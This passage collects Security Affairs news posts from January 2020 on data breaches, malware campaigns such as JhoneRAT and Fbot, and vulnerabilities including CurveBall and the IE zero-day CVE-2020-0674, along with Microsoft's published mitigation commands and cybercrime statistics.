Tech support scams entail a scammer contacting users and pretending to be a Microsoft support representative. These types of scams are quite prevalent, and even when scammers don’t have any personal information about their targets, they often impersonate Microsoft staff. Microsoft Windows is, after all, the most popular operating system in the world.”

Technical support logs frequently expose VIP clients, their internal architectures, such kind of data could be used by cyber criminals to compromise the customers’ systems.

The company started notifying impacted customers, below the timeline of the data leak:

  • December 28, 2019 – The databases were indexed by search engine BinaryEdge
  • December 29, 2019 – Diachenko discovered the databases and immediately notified Microsoft.
  • December 30-31, 2019 – The tech giant secured the servers and data. Diachenko and Microsoft continued the investigation and remediation process.
  • Jan 21, 2020 – Microsoft disclosed additional details about the exposure as a result of the investigation.

Pierluigi Paganini

(SecurityAffairs – data leak, hacking)

The post 250 Million Microsoft customer support records and PII exposed online appeared first on Security Affairs.

Malware attack took down 600 computers at Volusia County Public Library

System supporting libraries in Volusia County were hit by a cyber attack, the incident took down 600 computers at Volusia County Public Library (VCPL) branches.

600 staff and public access computers were taken down at Volusia County Public Library (VCPL) branches in Daytona Beach, Florida, following a cyberattack. The attack started around 7 AM on January  9, 2020.

“The county’s technology staff were immediately notified and coordinated recovery efforts with library staff,” reads the official statement.

“Approximately 50 computers are back online, enabling library staff to perform patron business, such as checking books in and out, and making reservations.”

The library did not disclose the family of malware that infected its system, but experts believe that the computers were infected with ransomware.

The good news is that the cyber attack did not affect the ordinary operations of the Volusia County Public Library, the website of the library was not impacted too. Public Wi-Fi in the library was also not impacted by the attack, according to the statement, “the public is able to safely use Wi-Fi within the libraries on personal devices.”

As a result of the incident, the computers at the library were not able to surf the web.

“The county is conducting an investigation and more information will be available at a later date,” VCPL staff also said.

“Some Californian libraries are also affected by a ransomware attack that encrypted computers at 26 community libraries in Contra Costa County on January 3.” reported BleepingComputer.

Pierluigi Paganini

(SecurityAffairs – Volusia County Library, hacking)

The post Malware attack took down 600 computers at Volusia County Public Library appeared first on Security Affairs.

Jeff Bezos phone was hacked by Saudi crown prince

The phone of the Amazon billionaire Jeff Bezos was hacked in 2018 after receiving a WhatsApp message from the personal account of the crown prince of Saudi Arabia.

In April 2019, Gavin de Becker, the investigator hired by Amazon chief Jeff Bezos to investigate into the release of his intimate images revealed that Saudi Arabian authorities hacked the Bezos’s phone to access his personal data.

Gavin de Becker explained that the hack was linked to the coverage by The Washington Post newspaper, that is owned by Bezos, of the murder of Saudi journalist Jamal Khashoggi.

Gavin De Becker investigated the publication in January of leaked text messages between Bezos and Lauren Sanchez, a former television anchor who the National Enquirer tabloid newspaper said Bezos was dating.

Jeff Bezos hired Gavin de Becker & Associates to find out how his intimate text messages and photos were obtained by the Enquirer.
Jeff Bezos blamed the Enquirer publisher American Media Inc of “blackmail” for threatening to publish the private photos if he did not stop the investigation. Jeff Bezos refused and decided to publicly disclose copies of emails from AMI.

In an article for The Daily Beast website, De Becker wrote that the parent company of the National Enquirer, American Media Inc., had demanded that De Becker deny finding any evidence of “electronic eavesdropping or hacking in their newsgathering process.”

“Our investigators and several experts concluded with high confidence that the Saudis had access to Bezos’ phone, and gained private
 leaked text messages between Bezos and Lauren Sanchez, a former television anchor who the National Enquirer tabloid newspaper said Bezos was dating. ,” de Becker wrote on The Daily Beast website.

Now The Guardian provides additional details on the spying asserting that the intimate pictures were obtained through a sophisticated hacking operation directed by the crown prince of Saudi Arabia, Mohammad bin Salman.

According to anonymous sources of The Guardian, Bezos’ phone was hacked using a WhatsApp message from the personal account of bin Salman himself.

“The Amazon billionaire Jeff Bezos had his mobile phone “hacked” in 2018 after receiving a WhatsApp message that had apparently been sent from the personal account of the crown prince of Saudi Arabia, sources have told the Guardian.” reads the article published by The Guardian.

“The encrypted message from the number used by Mohammed bin Salman is believed to have included a malicious file that infiltrated the phone of the world’s richest man, according to the results of a digital forensic analysis. “

According to the sources, Bezos received a bait video file sent on May 1, 2018, that allowed it to infect its mobile device. The malicious code was used to spy on Bezos siphoning large amounts of data from his phone. The paper pointed out that at the time, the relationship between Bezos and the prince was good and the two were exchanging friendly messages.

The revelation could have severe repercussions, first of all it will complicate the position of Mohammad bin Salman and his alleged involvement in the murder of Jamal Khashoggi at the Saudi embassy in Istanbul, Turkey, in October 2018.

Saudi Arabia has previously denied its involvement in the murder of Khashoggi that was attributed to a “rogue operation”. In December, a Saudi court convicted eight people of involvement in the murder after a secret trial that was criticised as a sham by human rights experts.

The revelation will have a significant impact on the business relationships of the Saudi “MBS” with western investors in Saudi Arabia.

Another aspect to evaluate is the impact on the personal relationship between Trump and his son-in-law Jared Kushner with the crown prince.

US President always ignored the warning of the US intelligence and publicly expressed dislike of Jeff Bezos.

The Guardian asked the Saudi embassy in Washington about the claims, and later a message on Twitter refused any accusation and labeled them as “absurd”.

The UN as announced the imminent release of an investigation.

Pierluigi Paganini

(SecurityAffairs – Bezos, hacking)

The post Jeff Bezos phone was hacked by Saudi crown prince appeared first on Security Affairs.

OP Glowing Symphony – How US military claims to have disrupted ISIS ‘s propaganda

US military claims to have disrupted the online propaganda activity of the Islamic State (ISIS) in a hacking operation dating back at least to 2016.

In 2016, the US Cyber Command carried out successful operations against the online propaganda of the Islamic State (ISIS), this is what emerged from declassified national security top-secret documents released on Tuesday.

The documents have been release under a Freedom of Information Act request.

According to the documents, the US Cyber Command “successfully contested ISIS in the information domain,” its operations had a significant impact on online radicalization and recruitment of the terrorist organization.

The first offensive hacking operation dated back 2016 and dubbed “Operation Glowing Symphony” was detailed in the documents released by the National Security Archive at George Washington University.

“Today the National Security Archive is releasing 6 USCYBERCOM documents obtained through FOIA which shed new light on the campaign to counter ISIS in cyberspace.” reads a post published by the National Security Archive at George Washington University. “These documents, ranging from a discussion of assessment frameworks to the 120-day assessment of Operation GLOWING SYMPHONY, reveal the unprecedented complexity of the operation, resulting challenges in coordination and deconfliction, and assessments of effectiveness.”

ISIS OP Glowing Symphony

The offensive Operation Glowing Symphony was carried out in November 2016 by Joint Task Force Ares (JTF-Ares), it mainly aimed at disrupting ISIS propaganda efforts by hacking or hijacking online social media accounts, and taking down websites used by the terrorist organization to spread propaganda.

The documents reveal the result of a 120-day assessment US Cyber Command conducted after the completion of Operation Glowing Symphony.

The assessment pointed out problems faced by the US cyber units, including the challenges of storing a huge amount of data contained in the hacked ISIS servers and accounts and the difficulty in coordination with other coalition members and US government agencies.

The Operation Glowing Symphony was approved in 2016 by president Barack Obama. It was initially approved for a 30-day period in late 2016, but it was later extended.

Operation GLOWING SYMPHONY is considered an important mileston in the counter-terrorism efforts and demonstrates the efficiency of the US offensive cyber capability against online propaganda of the Islamic State (ISIS).

“Operation GLOWING SYMPHONY was originally approved for a 30-day window, but the a July 2017 General Administrative Message reported the operation’s extension to an unknown date. Whether the operation is currently ongoing or not, it is public knowledge that JTF-ARES continues to operate.” continues the post. “It is also increasingly apparent that the counter-ISIS mission, JTF-ARES, and Operation GLOWING SYMPHONY are viewed within the US military’s cyber-warfighting community as not just a chapter in counter-terrorism and ‘low-intensity conflict’, but as demonstrations of the nation’s offensive cyber capability and a model for conducting an “American way” of cyber warfare.”

Pierluigi Paganini

(SecurityAffairs – OP Glowing Symphony, ISIS)

The post OP Glowing Symphony – How US military claims to have disrupted ISIS ‘s propaganda appeared first on Security Affairs.

Yomi Hunter Catches the CurveBall

Yomi implements detection for CurveBall exploits and also supports CVE-2020-0601 exploit detection even for signed Powershell modules. 

The recent CurveBall vulnerability shook the Info-Sec community worldwide: a major vulnerability reported directly by the US National Security Agency.

Such uncommon vulnerability reporter alerted the whole Industry, CVE-2020-0601 quickly conquered most of the headlines. 

The reason for this unusual outreach is still not clear, but Microsoft, along with many experts in the industry, confirmed it actually is an important vulnerability having real chances of being abused in the wild.  

The Malware Threat behind CurveBall

There was a little misunderstanding during the first hours after the disclosure of the CVE-2020-0601 vulnerability. Many system administrators and companies were rushing to update internet exposed machines, like web servers or gateways, worried about possible remote code execution, reviving the EternalBlue/WannaCry crisis in their mind. 

Luckily, CurveBall is not the same type of issue. But, if this is true, how exactly it may impact the IT infrastructure and why did the NSA raise such alarm?

What the NSA states is real: CVE-2020-0601 exposes companies to high risks. But it does in a more stealthier way and, differently from EternalBlue, not in a way could be exploited by criminals and vandals for an Internet wide CryptoWorm infection.

In fact, CurveBall enables attackers to trick Windows 10, Windows Server 2016 and Windows Server 2019, to impersonate other trusted parties such as Microsoft itself, resulting in being successfully cryptographically verified by the vulnerable hosts.

Pragmatically, this means organizations relying on CVE-2020-0601 vulnerable cryptography implementations to protect their communication are at risk of man in the middle attacks, and impersonification in general. Even cryptographically signed files and emails are exposed to spoofing and tampering, violating the core parts of the threat models most of the company use to secure their businesses.

Is it all? No. 

CurveBall also poses at risk endpoints and security perimeters due to its appeal for one of the most relevant threats for modern businesses: Malware.

In fact, signed files equal signed malware in the modern threat panorama. Thus, several threat actors, both state-sponsored and cyber criminals, may likely abuse the CurveBall vulnerability to fake Microsoft signed executables, impersonating legit files and potentially tricking perimetral and endpoint security technologies relying on the faulty Windows cryptographic validation. 

Yomi Hunter Catches CVE-2020-0601

So, after evaluating the risks of CurveBall exploitation in the wild, especially considering the release of public tools to abuse the vulnerability to sign arbitrary files, we rolled out a new update of Yomi Hunter able to catch CurveBall exploit attempts.

Now, both Private and Public instances of the Yomi Sandbox are actively looking for CVE-2020-0601 exploits trying to evade traditional security controls. The new detection logic is available into malware reports generated by Yomi-Hunter community (e.g. LINK), within the new VirusTotal integrated reports, and for every private instances in use by Yoroi’s Cyber Security Defence Center customers.

Figure. CVE-2020-0601 exploit on Yomi Hunter

But, Yomi Hunter does not limit to hunt for Portable Executable files exploiting Curveball. The cryptographic detection mechanism rolled out in the new update supports CVE-2020-0601 exploit detection even for signed Powershell modules.  

If you want to try Yomi: The Malware Hunter please register here!

Pierluigi Paganini

(SecurityAffairs – Curveball, hacking)

The post Yomi Hunter Catches the CurveBall appeared first on Security Affairs.

The Mystery of Fbot

In a few days back, the MalwareMustDie team’s security researcher unixfreaxjp has published a new Linux malware analysis of Fbot that has focused on the decryption of the last encryption logic used by its bot client.

This is not the first time Fbot analysis has been published, and also Fbot binaries have been actively infecting the IoT devices since way before 2018.

This article explains what we have learned about the Fbot traced back from the year of 2014. And will discuss the mysteries that can be seen after Fbot has been detected.

The background before Fbot Mirai variant

Fbot is one of the Mirai’s variants, and Mirai is the Linux malware that originally has been detected in August 2016 by the same team who wrote the last analysis mentioned above. On the boom of Mirai source code leaks by its malware coder (nickname: AnnaSenpai), followed by the sharing of its source code openly in the Github within only a month after the analysis report has been published, a lot of young hackers involved in the “DDoS criminal ecosystem”, who had been actively using IoT devices for the DDoS purpose before Mirai malware was born, were racing in a big wave to learn how to install, adapt and transform Mirai to their DDoS botnet platforms, which most of them were built on Kaiten, STD, GafGyt (known also as Qbot or Torlus or Bashlite), or Perlbot malware source code, since Mirai had been proven to be more recently coded, powerful flood, is having anti-reverse-engineered tricks.

This wave is a significant timeline as a technology step-up for DDoS botnet and IoT malware development.

It is known in the underground that origin of Satori, the predecessor code of what is known as Fbot now, had been started to be developed after the leak of Mirai code, young botnet coders, who mostly also herders of Qbot (GafGyt) botnets. One of them who lives in the UK known under various nicknames of Vicious, ViciousAttack, Vi, Vamp, DustPan, NixFairy, HollySkye or RespectVicious, had allegedly been involved with this variant’s development too.

Fbot

(Figure 1 – Vamp’s account on Twitter)

Vamp was among a number of suspects who had been arrested across the United Kingdom on the investigation of the TalkTalk cyber incident that happened in 2015, and he is also a suspect on the activity of Mirai botnet that made great damage in the several parts of the globe from 2016. Vamp, along with other “partners” (including Nexus Zeta, who has been indicted of a similar crime in the US), had his involvement with the original development of Satori botnet. After the legal matter had happened, Vamp was out of the grid and the recent news about him is the legal matter of lifting of his anonymity in 2018. As you can also see it in The Irish News published an article on 14 March, 2018, we quoted:

“With the criminal case now concluded, Mr Simpson said: ” ..this young man has now been dealt with, and he is now over 18 (years old). On that basis Mr Justice Maguire agreed to discharge the prohibition on identifying the teenager.”

The mystery of Fbot

What had happened now is the re-emerged of the SATORI Mirai variant basis with the payload called Fbot.[.supported_architecture], which has been detected since September 2018 on several honeypot logs and has been reported also in the analysis we mentioned here.

Fbot

(Figure 2 – Fbot Scanning Activities with “SATORI” Keyword Detected)

The link between Fbot and Satori base is detected in its infection’s activity and executable file. For example, in the scanner log:

And also in the binary as hardcoded strings:

Fbot

(Figure 3 – The Hardcoded “SATORI” Strings in Fbot Binary)

Would it be one of the “partners” during Satori development has renamed compiled binaries of the Satori project into Fbot? What are Vamp, NexusZeta doing nowadays? Or, would it b someone else uses the whole source code of the Satori project and re-use it for his own by naming the compiled binaries as Fbot?

This is the mystery that comes to our mind after reading the complete report published in MalwareMustDie last report.

To make things more mysterious is, right now, the Fbot infected devices are detected to still performing infection to other IoT devices, but the payload is not being dropped from the C2 server.

The latest detection can be seen in the post of MalwareMustDie latest post too:

Fbot

(Figure 4 – Recent Record of Fbot Infection Log In the Analysis Article)

Although it has been confirmed by the researchers that since the analysis has been posted by in MalwareMustDie post, the C2 for Fbot is not dropping new payloads for the further infection activity.

Would it mean that the coder of Fbot is abandoning his botnet after all of this time?

Whoever the herder is, we all hope that the coder will stop his malicious activity for good.

Pierluigi Paganini

(SecurityAffairs – Fbot, malware)

The post The Mystery of Fbot appeared first on Security Affairs.

Expert found a hardcoded SSH Key in Fortinet SIEM appliances

Expert found a hardcoded SSH public key in Fortinet ’s Security Information and Event Management FortiSIEM that can allow access to the FortiSIEM Supervisor. 

Andrew Klaus, a security specialist from Cybera, discovered a hardcoded SSH public key in Fortinet’s Security Information and Event Management FortiSIEM that can be used by attackers to the FortiSIEM Supervisor. 

The expert discovered that the Fortinet devices share the same SSH key for the user ‘tunneluser‘, and it is stored in plain text.

FortiSIEM has a hardcoded SSH public key for user “tunneluser” which is the same between all installs. An attacker with this key can successfully authenticate as this user to the FortiSIEM Supervisor.” reads the security advisory. “The unencrypted key is also stored inside the FortiSIEM image. While the user’s shell is limited to running the /opt/phoenix/phscripts/bin/tunnelshell script, SSH authentication still succeeds.”

Fortinet published a security advisory for the issue that is tracked as CVE-2019-17659.

The vulnerability could be exploited by attackers to trigger a confition of denial of service. 

“A use of hard-coded cryptographic key vulnerability in FortiSIEM may allow a remote unauthenticated attacker to obtain SSH access to the supervisor as the restricted user “tunneluser” by leveraging knowledge of the private key from another installation or a firmware image.” reads the advisory.

The user ‘tunneluser‘ only runs in a restricted shell that lets only that user create tunnel connections from the supervisor to the originating IP.

The feature was implemented to enable connecting to collectors from the supervisor when there is a firewall between the collector and the supervisor.

Fortinet invites customers that are not using the reverse tunnel feature to disable SSH on port 19999 that only allows tunneluser to authenticate. Fortinet also advise customers to disable “tunneluser” SSH access on port 22.

Below the timeline of the vulnerability:

  • Dec 2, 2019: Email sent to Fortinet PSIRT with vulnerability details.
  • Dec 3, 2019: Automated reply from PSIRT that email was received.
  • Dec 23, 2019: Sent a reminder email to PSIRT about requesting a human confirmation.
  • Jan 3, 2019: Public Release.

The flaw affects FortiSIEM version 5.2.6 and below, the tech firm addressed it with the release of FortiSIEM version 5.2.7. 

Pierluigi Paganini

(SecurityAffairs – FortiSIEM, hacking)

The post Expert found a hardcoded SSH Key in Fortinet SIEM appliances appeared first on Security Affairs.

Mitsubishi Electric discloses data breach, media blame China-linked APT

Mitsubishi Electric disclosed a security breach that might have exposed personal and confidential corporate information.

Mitsubishi Electric disclosed a security breach that might have exposed personal and confidential corporate data. According to the company, attackers did not obtain sensitive information about defense contracts.

The breach was detected almost eight months ago, on June 28, 2019, with the delay being attributed to the increased complexity of the investigation caused by the attackers deleting activity logs.

“On June 28, last year, a suspicious behavior was detected and investigated on a terminal in our company, and as a result of unauthorized access by a third party, data was transmitted to the outside,” reads a data breach notification published by the company.

The intrusion took place on June 28, 2019, and the company launched an investigation in September 2019. Mitsubishi Electric disclosed the security incident only after two local newspapers, the Asahi Shimbun and Nikkei, reported the security breach.

Mitsubishi Electric had also already notified members of the Japanese government and Ministry of Defense.

This morning, at a press conference, Yoshii Kan, a secretary-general of Japan, said that the company had reported the intrusion. Although Mitsubishi Electric is dealing with government agencies such as the Ministry of Defense, Mr. Kan said, “I was notified that it was confirmed that there was no leak of sensitive information such as defense equipment and electric power.”

“Mitsubishi Electric, a major general electronics maker , has been hit by a large-scale cyber attack , and it has been found that information about public and private business partners such as highly confidential defense-related and important social infrastructure such as electric power and railroad may leak out.” reported the Asahi Shimbun. “An internal survey found that computers and servers at headquarters and major sites were subject to numerous unauthorized accesses.”

Mitsubishi Electric

The two media outlets attribute the cyber attack to a China-linked cyber espionage group tracked as Tick (aka Bronze Butler).

The hacker group has been targeting Japanese heavy industry, manufacturing and international relations at least since 2012,

According to the experts, the group is linked to the People’s Republic of China and is focused on exfiltrating confidential data.

“According to people involved, Chinese hackers Tick may have been involved. According to Mitsubishi Electric, “logs (to check for leaks) have been deleted and it is not possible to confirm whether or not they actually leaked.” reported the Nikkei.

“According to the company, at least tens of PCs and servers in Japan and overseas have been found to have been compromised. The amount of unauthorized access is approximately 200 megabytes, mainly for documents.”

The security breach was discovered after Mitsubishi Electric staff found a suspicious file on one of the company’s servers, further investigation allowed the company to determine that hack of an employee account.

According to the media, hackers gained access to the networks of around 14 company departments, including sales and the head administrative office. Threat actors stole around 200 MB of files including:

  • Personal information and recruitment applicant information (1,987) 
  • New graduate recruitment applicants who joined the company from October 2017 to April 2020, and experienced recruitment applicants from 2011 to 2016 and our employee information (4,566) 
  • 2012 Survey results regarding the personnel treatment system implemented for employees in the headquarters in Japan, and information on retired employees of our affiliated companies (1,569) 

“Exchanges with government agencies such as the Ministry of Defense, the Nuclear Regulatory Commission, the Agency for Natural Resources and Energy, the Cabinet Office, and the Ministry of the Environment,” as well as “transaction-related conference materials such as joint development with private companies such as electric power, railways, and telecommunications, and product orders” might also have been leaked.” reported Kyodo News.

The company is still investigating the security breach, but it seems that attackers have attempted to delete any evidence of the attack.

Mitsubishi Electric is going to report the incident to the affected customers.

“We are informing the affected customers of the possible breach of trade secrets,” states the company.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Mitsubishi Electric discloses data breach, media blame China-linked APT appeared first on Security Affairs.

NATO will send a counter-hybrid team to Montenegro to face Russia’s threat

The Chairman of the NATO Military Committee announced that the alliance has sent a counter-hybrid team to Montenegro to face Russian hybrid attacks.

Last week in Brussels, the Chairman of the NATO Military Committee (MC), Marshal Sir Stuart Peach, announced the effort of the Alliance in facing Russian hybrid attacks.

The term “Hybrid warfare” refers to a military strategy which employs political warfare and blends conventional warfare, irregular warfare and cyberwarfare with other influencing methods, such as fake news, diplomacy, lawfare and foreign electoral intervention.

Peach said that the NATO alliance had set up the first NATO counter-hybrid team in Montenegro.

“The first NATO counter-hybrid team has been deployed to our ally state, Montenegro, with the aim of helping to strengthen Montenegro’s capacities and deterring hybrid challenges”, Peach said.

Several countries, especially Russia, continue their aggressive operations against foreign states, and cyber warfare is becoming the main concern for almost any government.

The official explained that since 2014 the defence spending to face hybrid threats has continued to increase, it has been estimated that by 2024 that amount will reach $ 400 billion.

“NATO data shows a 4,6% increase in 2019. That is the fifth consecutive year of growth. By the end of this year, allies will have invested over $130 billion”, added Marshal Peach

United States Army General Mark Milley, the highest military officer and military adviser to the President, Minister of Defence and U.S. National Security Council, accused the Russian Government of attempting to destabilize the members of the alliance and divide it.

it is evident that Russia has been trying to divide NATO and make it weaker”. General Milley said.

“It would be their benefit. It would be detrimental to Europe and the US if NATO just collapsed and disintegrated.”

Representatives of Montenegro’s Defence Ministry confirmed that NATO counter-hybrid team visited Montenegro in November. Experts fear that Russia could attempt to influence the forthcoming parliamentary elections that will take place in October 2020.

“This visit was the first such engagement in one of the allies, and it was an important experience for Montenegro. Montenegro wants to enhance its capacities and the focus of NATO’s team was on strengthening legislative framework in this domain and its implementation”, said Ivica Ivanović, director general for defence policy.

On June 5, 2017 Montenegro officially joined NATO alliance despite the strong opposition from the Russian Government that threatened to retaliate.

Cybersecurity experts believe that a new wave of attacks from the cyberspace will hit the state. In February 2017, for the second time in a few months, Montenegro suffered massive and prolonged cyberattacks against government and media websites.

Researchers at security firm FireEye who analyzed the attacks observed malware and exploits associated with the notorious Russia-linked APT group known as APT28 (aka Fancy BearPawn StormStrontiumSofacySednit, and Tsar Team).

Another massive attack hit the country’s institutions during October 2016 elections, amid speculation that the Russian Government was involved.

Hackers targeted Montenegro with spear-phishing attacks, the malicious messages used weaponized documents pertaining to a NATO secretary meeting and a visit by a European army unit to Montenegro.

At the time, the cyberspies delivered the GAMEFISH backdoor (aka Sednit, Seduploader, JHUHUGIT, and Sofacy), a malware that was used only by the APT28 group in past attacks.

Pierluigi Paganini

(SecurityAffairs – Montenegro, elections)

The post NATO will send a counter-hybrid team to Montenegro to face Russia’s threat appeared first on Security Affairs.

JhoneRAT uses Google Drive, Twitter, ImgBB, and Google Forms to target countries in Middle East

Researchers from Cisco Talos discovered a new Trojan named JhoneRAT that was used in targeted attacks against entities in the Middle East.

A new Trojan named JhoneRAT appeared in the threat landscape, it is selectively attacking targets in the Middle East by checking keyboard layouts.

The malware targets a very specific set of Arabic-speaking countries, including Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain, and Lebanon.

“Today, Cisco Talos is unveiling the details of a new RAT we have identified we’re calling “JhoneRAT.” This new RAT is dropped to the victims via malicious Microsoft Office documents.” reads the analysis published by Cisco Talos. “The dropper, along with the Python RAT, attempts to gather information on the victim’s machine and then uses multiple cloud services: Google Drive, Twitter, ImgBB and Google Forms.”

JhoneRAT

The experts discovered that the RAT is distributed via weaponized Office documents, it leverages multiple cloud services (i.e. Google Drive, Twitter, ImgBB and Google Forms) to avoid detection. 

The JhoneRAT is written in Python, it attempts to download additional payloads and upload the information gathered during the reconnaissance phase.

Talos researchers identified three weaponized Microsoft Office documents that download and load an additional document containing a Macro. The first document named “Urgent.docx” is dated back November 2019.  

The second document named “fb.docx” is dated January and claims to contain data on a Facebook information leak. The third document found in the mid-January pretends to be from a legitimate United Arab Emirate organization. 

The additional Office documents loaded and executed by the JhoneRAT are hosted through Google Drive in the attempt to avoid URL blacklisting. 

JhoneRAT is dropped through Google Drive, which hosts images with a base64-encoded binary appended at the end. Once the images are loaded onto a target machine will deploy the Trojan that harvests information from the victim’s machine (i.e. OS, disk serial numbers, the antivirus, and more). 

The malware used Twitter as C2 while exfiltrates information, it checks a public Twitter feed every 10 seconds.

When communicating with its command-and-control server (C2) in order to exfiltrate information, it checks for comments every 10 seconds.

“This RAT uses three different cloud services to perform all its command and control (C2) activities. It checks for new commands in the tweets from the handle @jhone87438316 (suspended by Twitter) every 10 seconds using the BeautifulSoup HTML parser to identify new tweets.” continues the analysis. “These commands can be issued to a specific victim based on the UID generated on each target (by using the disk serial and contextual information such as the hostname, the antivirus and the OS) or to all of them.”

Experts pointed out that stolen data are exfiltrated through cloud providers, for example, screenshots are uploaded to ImgBB, while commands are executed with output sent to Forms. The malware download binaries disguised has a picture from the Google Drive and execute them.

“The attacker put a couple of tricks in place to avoid execution on virtual machines (sandbox). The first trick is the check of the serial number of the disk. The actor used the same technique in the macro and in the JhoneRAT. By default, most of the virtual machines do not have a serial number on the disk.” continues the analysis.

“The attacker used a second trick to avoid analysis of the Python code. The actor used the same trick that FireEye in the Flare-On 6: Challenge 7: They removed the header of the Python bytecode.”

According to the experts, the campaign is still ongoing, even if the Twitter account is suspended, attackers can easily create new accounts and use them in the same way.

“This campaign shows a threat actor interested in specific Middle Eastern and Arabic-speaking countries. It also shows us an actor that puts effort in opsec by only using cloud providers.” concludes the report. “The malicious documents, the droppers and the RAT itself are developed around cloud providers. Additionally the attackers implemented anti-VM (and sandbox) and anti-analysis tricks to hide the malicious activities to the analyst.”

The analysis published by Talos contains additional technical details, including Indicators of Compromise.

Pierluigi Paganini

(SecurityAffairs – JhoneRAT, malware)

The post JhoneRAT uses Google Drive, Twitter, ImgBB, and Google Forms to target countries in Middle East appeared first on Security Affairs.

Security Affairs newsletter Round 247

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Google removed 1.7K+ Joker Malware infected apps from its Play Store
MageCart attack hit Australia bushfire Donors
New Bill prohibits intelligence sharing with countries using Huawei 5G equipment
5G – The Future of Security and Privacy in Smart Cities
Facebook quickly fixed a bug exploited in attacks that exposed Page Admins info
Hacker that hit UK National Lottery in 2016 was sentenced to prison
Maze Ransomware operators leak 14GB of files stolen from Southwire
US officials meet UK peers to remark the urgency to ban Huawei 5G tech
China-linked APT40 group hides behind 13 front companies
Cisco addressed a high-severity bug in Webex that could allow Remote Code Execution
January 2020 Adobe Patch Tuesday updates fix issues in Illustrator, Experience Manager
Why Russian APT Fancy Bear hacked the Ukrainian energy firm Burisma?
Hacker offers for sale 49 million user records from US data broker LimeLeads
Iranian Threat Actors: Preliminary Analysis
Microsoft addresses CVE-2020-0601 flaw, the first issue ever reported by NSA
P&N Bank data breach may have impacted 100,000 West Australians
VMware addresses flaws in VMware Tools and Workspace ONE SDK
5ss5c Ransomware emerges after Satan went down in the hell
Critical auth bypass issues affect InfiniteWP Client and WP Time Capsule WordPress plugins
Hundreds of million users installed Android fleeceware apps from Google Play
Two PoC exploits for CVE-2020-0601 NSACrypto flaw released
Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity
Expert released PoC exploits for recently disclosed Cisco DCNM flaws
Hack the Army bug bounty program paid $275,000 in rewards
Law enforcement seized WeLeakInfo.com for selling access to data from data breaches
Cybercrime Statistics in 2019
Microsoft provides mitigation for actively exploited CVE-2020-0674 IE Zero-Day
Turkish Hackers hit Greek Government websites and local stock exchange

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 247 appeared first on Security Affairs.

Microsoft provides mitigation for actively exploited CVE-2020-0674 IE Zero-Day

Microsoft published a security advisory to warn of an Internet Explorer (IE) zero-day vulnerability (CVE-2020-0674) that is currently being exploited in the wild.

Microsoft has published a security advisory (ADV200001) that includes mitigations for a zero-day remote code execution (RCE) vulnerability, tracked as CVE-2020-0674, affecting Internet Explorer.

The tech giant confirmed that the CVE-2020-0674 zero-day vulnerability has been actively exploited in the wild.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the advisory published by Microsoft. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

An attacker could exploit the flaw to can gain the same user permissions as the user logged into the compromised Windows device. If the user is logged on with administrative permissions, the attacker can exploit the flaw to take full control of the system.

The CVE-2020-0674 flaw could be triggered by tricking victims into visiting a website hosting a specially crafted content designed to exploit the issue through Internet Explorer.

Microsoft announced that it is currently working on a patch to address the vulnerability, the company will likely release an out-of-band update because attackers are already exploiting the flaw in the wild.

Microsoft suggests restricting access to JScript.dll using the following workaround to mitigate this zero-day flaw.

For 32-bit systems, enter the following command at an administrative command prompt:

    takeown /f %windir%\system32\jscript.dll
    cacls %windir%\system32\jscript.dll /E /P everyone:N

For 64-bit systems, enter the following command at an administrative command prompt:

    takeown /f %windir%\syswow64\jscript.dll
    cacls %windir%\syswow64\jscript.dll /E /P everyone:N
    takeown /f %windir%\system32\jscript.dll
    cacls %windir%\system32\jscript.dll /E /P everyone:N

The company warns that implementing these mitigation might impact the functionality for components or features that use the jscript.dll.

“Implementing these steps might result in reduced functionality for components or features that rely on jscript.dll. To be fully protected, Microsoft recommends the update be installed as soon as possible. Please revert the mitigation steps before installing the update to return to a full state.” continues the advisory.

To undo the workaround, use the following procedures.

For 32-bit systems, enter the following command at an administrative command prompt:

    cacls %windir%\system32\jscript.dll /E /R everyone    

For 64-bit systems, enter the following command at an administrative command prompt:

    cacls %windir%\system32\jscript.dll /E /R everyone    
    cacls %windir%\syswow64\jscript.dll /E /R everyone

Pierluigi Paganini

(SecurityAffairs – CVE-2020-0674, hacking)

The post Microsoft provides mitigation for actively exploited CVE-2020-0674 IE Zero-Day appeared first on Security Affairs.

Cybercrime Statistics in 2019

I’m preparing the slides for my next speech and I decided to create this post while searching for interesting cybercrime statistics in 2020

Cybercrime will cost as much as $6 trillion annually by 2021.

The global expense for organizations to protect their systems from cybercrime attacks will continue to grow. According to the Cybersecurity Ventures’ cybercrime statistics 2017 cybercrime damages will amount to a staggering $6 trillion annually starting in 2021. Experts fear that the cost of cybercrime should exceed annual costs for natural disasters by 2021. These figures suggest that cybercrime is becoming more profitable than other criminal activities, such as the illegal drug trade. 

Financial losses reached $2.7 billion in 2018.

According to the IC3 Annual Report released in April 2019 financial losses reached $2.7 billion in 2018. Most financially devastating threats involved investment scams, business email compromises (BEC), and romance fraud

The total cost of cybercrime for each company in 2019 reached US$13M.

The total cost of cybercrime for each company increased from US$11.7 million in 2017 to a new high of US$13.0 million—a rise of 12 percent, states the “NINTH ANNUAL COST OF CYBERCRIME STUDY” published by Accenture.

The total annual cost of all types of cyberattacks is increasing.

According to Accenture, malware and Web-based attacks continue to cause higher financial losses to organizations worldwide. The cost of ransomware attacks accounts for 21 percent of the overall expenses, while the cost of malicious insider accounts for 15 percent. The cost of malware attacks is now an average of US$2.6 million annually for organizations.

Source Accenture

Which countries have the worst (and best) cybersecurity?

According to a the report published by Comparitech that used the Global Cybersecurity Index (GCI) scores, Bangladesh saw the highest number of malware infections approximately 35.91% of the country’s mobile users have fallen victim to malware infections. The same report states that Japan is the most equipped country at preventing cybersecurity threats, with the smallest number of mobile malware infections, with only 1.34% of its mobile users affected by the attacks. Other top-performing countries included France, Canada, Denmark, and the United States.

Algeria is the least cyber-secure country, followed by Indonesia and Vietnam.

Which is the impact of cybercrime on small business?

